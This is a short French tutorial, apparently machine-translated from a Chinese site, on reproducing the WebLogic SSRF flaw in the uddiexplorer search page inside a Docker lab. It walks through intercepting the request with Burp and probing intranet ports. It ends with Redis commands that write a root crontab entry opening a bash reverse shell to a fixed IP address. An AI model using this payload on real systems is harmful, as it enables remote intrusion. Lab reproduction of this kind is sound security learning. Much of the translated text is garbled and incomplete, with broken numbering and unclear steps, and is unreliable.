Comment reproduire la vulnérabilité SSRF de Weblogic

1. Utilisez Docker pour créer un environnement

Tutoriel d'installation et de création d'environnement de Docker : https://www.freebuf.com/sectool/252257.html

Étapes de reproduction de la vulnérabilité2.

1. La vulnérabilité existe sur la page/uddiexplorer/SearchPublicRegistries.jsp

2 Vérifiez l'endroit IBM pour voir

et constatez qu'il s'agit d'une connexion, ce qui signifie que SSRF peut exister

3. Utilisez la suite burp pour capturer les paquets. Cliquez sur Rechercher

4 Modifiez la connexion des paramètres de l'opérateur

5. L'accès aux ports non existants n'a pas pu se connecter via HTTP

.

L'accès aux ports existants renvoie le code d'état

Accédez à l'intranet

Utilisez Redis pour rebondir la charge utile du shell

set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.220.151/1234 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!